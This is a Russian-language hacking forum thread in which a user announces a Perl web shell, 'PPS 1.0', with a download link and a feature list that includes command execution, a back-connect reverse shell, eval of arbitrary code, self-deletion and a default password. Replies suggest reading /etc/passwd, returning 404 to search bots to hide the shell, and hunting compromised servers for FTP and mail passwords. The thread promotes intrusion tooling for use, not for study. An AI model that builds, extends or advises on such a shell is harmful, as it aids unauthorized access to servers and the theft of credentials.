PPS 1.0 perl web-shell (http://bug-track.ru/prog/pps.tar.gz) <=download

http://s41.radikal.ru/i094/1004/7e/550e7712393et.jpg (http://radikal.ru/F/s41.radikal.ru/i094/1004/7e/550e7712393e.png.html)

1. Авторизация
2. SystemInfo
3. Листинг, загрузка, скачка, выполнение команд,просмотр файлов, редактирование файлов, chmod+touch+zip+unzip+delete папок/файлов в один клик
4. Консоль
5. phpMyAdmin на perl - пока только MySql (возможность отмечать несколько колонок для запроса)
6. Бекконект
7. Выполнение perl-кода из формы (eval)
8. Logout
9. Самоудаление
10. Работа через POST

Default password: root

375 строка

$s = "which gcc;which perl;which phyton;

мб python?

не хватает читалки /etc/passwd (что ли posix-getpwuid) ну и поисковым ботам ответ 404 возвращай.
поискал "rm -r" - не нашлось, не знаю как так будут удалятся папки.
имхо очень сырой шелл рано выложил

Спасибо за подсказки, буду дорабатывать.

update: все действия в шелле стали через POST

не хватает читалки /etc/passwd (что ли posix-getpwuid)
Зачем она тебе нужна?

Навигация по БД не удобна.... только по одной колонки можно смотреть данные. Некорректно работают конструкции: select id,user ... или select * ... выводит всегда одну колонку. Сделай навигацию как в wso.

хы, в процессе, пока можно так

select concat_ws(0x3a,id,user) from ....

небольшой рестайлинг

Вот это уже не плохо) ++

В общем доделал. Вроде юзабельно. Обновления в 1-м посте

прикрути свой диз,подумал это всо =\

WSO.pl

прикрути свой диз,подумал это всо =\
зачем изобретать ненужный велосипед? чем диз всо не нравится?

шелл должен выполнять свои ф-и, быть компактным и универсальным... а не с дизайном от артемия лебедева....

Спасибо за шел. Реально нужная вещь.

зачем изобретать ненужный велосипед? чем диз всо не нравится?

шелл должен выполнять свои ф-и, быть компактным и универсальным... а не с дизайном от артемия лебедева....

читай правильно мой пост

вроде бы все правильно прочитал

which gcc;which perl;which python;which php;which tar;which zip

можно ж заменить на

which gcc perl python php tar zip

вроде бы все правильно прочитал

тепер подумай

Pashkela суперский шел !!!!

парочку нюансов заметил:
* не сжимает ответ gzip-ом (хотя возможно сервак такой попался)
* если в Files выбрать галку Name то выделения всех, как в wso в той же ситуации, не происходит
* для [zip] надо бы сделать выбор пути куда будет сохранятся результат, а то редко бывает когда где хошь, там и пишешь

ps версия от 28,04,10

[добавлено]
да, кстати, я так понял групповых операций нет ? т.е. выделяй, не выделяй галочками операция проводится только над тем файлом/папкой напротив которой выбрана команда... а в wso все это есть ;) можно ?

[добавлено]
да, кстати, я так понял групповых операций нет ? т.е. выделяй, не выделяй галочками операция проводится только над тем файлом/папкой напротив которой выбрана команда... а в wso все это есть ;) можно ?

версия децл обновлена уже, пароль от шелла в md5 + еще пара исправлений. Качайте новую. Групповых операций пока нет, выбирать путь, куда архивировать в принципе можно сделать, архивация/разархивация путем тыканья кнопы - пока только поддержка tar, остальное ручками

В принципе от дальнейших апдейтов останавливает только то, что пока не нашел, как сжимать perl-скрипт, просто у меня планка 50кб) Всяческие perl-обфускаторы не уменьшают размер скрипта, а так в принципе туда можно много еще чего понапихать, начиная от стрингтулз и заканчивая всякими брутерами, вплоть до MD5, что на перле будет конечно гораздо быстрее и актуальнее. Просто дело в том, что все эти навороты можно поназагружать отдельными скриптами, так что не вижу смысла особого

PS: Представленный шелл далеко не WSO, ув. oRb просто маньяк, когда ми его код поизучал), PSS 1.0 просто был сделан, потому что не видел пока ни одного нормального GUI perl-шелла, для облегчения навигации в основном. Так что сравнивать тут, мягко говоря, нечего, кроме того, что дизайн был слизан из WSO, т.к. для меня это уже эталон

а так в принципе туда можно много еще чего понапихать, начиная от стрингтулз и заканчивая всякими брутерами, вплоть до MD5, что на перле будет конечно гораздо быстрее и актуальнее. Просто дело в том, что все эти навороты можно поназагружать отдельными скриптами, так что не вижу смысла особого
насчет понапихать. в чем смысл, суть шела ? получение доступа к системе, облегчение доступа к системе. исходя из этого, мне кажется, было бы здорово реализовать что-то типа анализа системы - поиска файлов с ftp парлолями, mail паролями и прочей инфы, которая полезна при исследовании системы.
насчет ограничения в 50К - как вариант, например, сделать подгружаемые модули - указать в настройках хост/ip где лежат модули и при необходимости копировать их куда надо или в tmp
perl же вообще намного более удобный инструмент для исследования системы, чем php, а тулзы ты классные и полезные умеешь писать ...